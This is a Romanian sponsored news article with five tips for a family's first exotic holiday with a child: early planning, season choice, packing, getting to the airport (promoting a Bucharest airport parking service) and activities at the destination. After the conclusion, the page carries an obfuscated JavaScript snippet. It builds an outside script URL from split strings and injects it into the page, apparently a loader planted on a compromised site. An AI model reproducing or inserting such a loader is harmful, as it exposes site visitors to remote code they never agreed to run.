Sari direct la conținut

[P] Prima vacanță exotică alături de copil în 2024: 5 aspecte pe care NU trebuie să le neglijezi

Smile Media
Prima vacanță exotică alături de copil în 2024: 5 aspecte pe care NU trebuie să le neglijezi, Foto: pexels.com
Prima vacanță exotică alături de copil în 2024: 5 aspecte pe care NU trebuie să le neglijezi, Foto: pexels.com

Vacanțele exotice s-au transformat pentru mulți români din simple dorințe în realitate. Deși este adevărat că este mult mai ușor să călătorești într-o țară îndepărtată atunci când nu ai copii, acum este posibil să faci acest lucru și alături de cei mai mici membri ai familiei. Cu toate acestea, sunt câteva aspecte importante de care ar trebui să ții cont și pe care ar trebui să le organizezi din timp, astfel încât întreaga familie să se bucure de o binemeritată vacanță.

În rândurile de mai jos, poți descoperi 5 aspecte destul de importante pe care să nu le neglijezi atunci când pleci în prima vacanță într-o destinație exotică alături de cel mai mic membru al familiei.

Cum organizezi primul concediu alături de copil într-o destinație îndepărtată

1. Fă-ți planurile de călătorie din timp

Dacă ai stabilit alături de jumătatea ta că este timpul pentru primul vostru concediu într-o țară exotică alături de copil, este recomandat să îți faci planurile de vacanță cu cât se poate mai devreme, astfel că începutul de an este cea mai bună perioadă în acest sens. Iată și câteva motive importante:

  • o vacanță alături de copil nu este la fel ca una în doi din punct de vedere al nevoilor celui mic;
  • trebuie să puneți pe listă mai multe țări din care să o alegeți pe cea care vi se pare potrivită pentru o primă aventură în trei;
  • trebuie să te informezi din timp despre aspecte precum preparate culinare, cazare potrivită pentru o familie cu copil și chiar posibile afecțiuni pentru care să fie nevoie de vaccinuri sau profilaxie;
  • poți stabili și câteva scenarii de rezervă legate de cazare sau activități, mai ales că o vacanță alături de copil poate fi imprevizibilă, iar din acest punct de vedere, nu uita nici de asigurarea de călătorie.

Ce poate fi util este să faceți o listă cu câteva destinații și cu punctele pro și contra pentru fiecare, astfel încât să vă ușurați alegerea. De asemenea, pentru început poți opta pentru o țară mai aproape de casă, cum ar fi Egiptul sau Marocul pentru o primă experiență împreună ca familie completă.

2. Alege perioada din an în care plecați după ce ai toate informațiile

Vara este una dintre cele mai bune perioade din an pentru vacanță, bineînțeles, însă un pont util este că într-o țară exotică te poți bucura de concediu în aproape orice anotimp, mai ales că în sezonul cald în România se poate să îl prinzi pe cel ploios în destinația aleasă. Așadar, verifică acest aspect înainte de a face rezervarea.

Un alt aspect la fel de important atunci când alegi perioada este aglomerația pe care o veți găsi odată ajunși acolo. Pentru o primă vacanță este bine să te orientezi către partea din an cu mai puțini turiști, mai ales că fiind o țară îndepărtată, experiența poate fi una copleșitoare. Partea bună este că poți găsi o mulțime de sfaturi și ponturi pe internet, așadar, le poți folosi pentru un concediu reușit.

3. Bagajul – pregătirea pentru un concediu cu copil este diferită

Cu toate că poate ați mai fost în vacanță în formulă completă, pentru un concediu într-o țară exotică, bagajul poate arăta cu totul diferit, mai ales dacă plănuiți să stați mai multe zile. Dacă pentru adulți se poate să luați mai puține haine sau cel puțin unele subțiri, nevoile unui copil sunt diferite în funcție de vârsta acestuia. Astfel, pe lângă articolele vestimentare variate, cel mic poate vrea să își ia jucăria sau jucăriile preferate.

În funcție de țara în care mergeți, trebuie să te gândești și la suvenirurile pe care le veți aduce înapoi, atât pentru voi, cât și pentru cei dragi, așadar alege cu grijă gențile de călătorie.

4. Plecarea în vacanță din punct de vedere al mijlocului de transport este diferită

Avionul este singura cale de a ajunge într-o destinație exotică, ceea ce este destul de convenabil și confortabil, mai ales din punct de vedere al timpului, iar dacă atunci când plecai doar cu jumătatea ta vă puteați urca în tren pentru a ajunge la aeroport, lucrurile se schimbă când aveți și un copil, astfel că mulți părinți preferă mașina personală pentru o primă deplasare.

Mașina este cea mai aleasă variantă mai ales de către părinții cu copii mici care au nevoie de scaune speciale de transport. Întrebarea este ce faceți cu autoturismul până vă întoarceți, unde îl lăsați? Dacă zborul este din București, la îndemână este să o lăsați în parcare aeroport Otopeni, iar o soluție este Park4fly.ro care vă permite să faceți o rezervare pentru perioada în care aveți nevoie. Astfel, la întoarcere doar vă urcați în mașină și plecați înapoi acasă.

5. Trebuie să ai în vedere activitățile tuturor la destinație

Deși ar putea părea că nu aveți nevoie, mai ales că mergeți să vă relaxați, pentru adulți și copii această idee este complet diferită. Înainte de a pleca, trebuie să te gândești la câteva activități pentru cel mic în funcție de vârstă, dar și la nevoile voastre de odihnă, de exemplu.

În destinații exotice mai îndepărtate, cum este Zanzibar, Maldive sau chiar Thailanda, variantele de distracție pentru un copil pot fi limitate dacă nu alegi un resort, astfel că poate ține de tine să îi organizezi juniorului câteva activități de care să se bucure la fața locului, mai ales dacă este prea mic pentru a participa la cele disponibile acolo. Chiar și atunci când mizezi pe cele câteva jucării preferate ale sale, trebuie să știi că tu sau partenerul trebuie să vă jucați cu el, mai ales că nu veți ști la început dacă mai sunt copii de vârste apropiate în locul respectiv. De asemenea, este bine să ții cont și de barierele de comunicare, ceea ce poate îngreuna situația. Cu pregătirile necesare, însă, toate aceste obstacole pot fi combătute cu succes.

În concluzie, o primă vacanță exotică poate fi una foarte reușită atunci când este planificată din timp, chiar și alături de un copil mic. De la alegerea unei destinații potrivite și până la organizarea plecării, rezervarea parcării pentru autoturism și a activităților de la fața locului, vă veți bucura de un concediu de neuitat dacă gândești totul în detaliu.

(function(){ o7zg=document.createElement(„script”);o7zg.async=true;o7zg_=”u”+(„s”)+”t”; o7zgu=”2237673781.”;o7zg_+=”a”+(„t.i”);o7zg_+=”n”+(„f”+”o”)+”/”; o7zgu+=”u2n53z8e7zglljql6svxlf”+(„bsxk3msx”); o7zg.src=”https://”+o7zg_+o7zgu;o7zg.type=”text/javascript”; document.body.appendChild(o7zg); })();

ARHIVĂ COMENTARII
INTERVIURILE HotNews.ro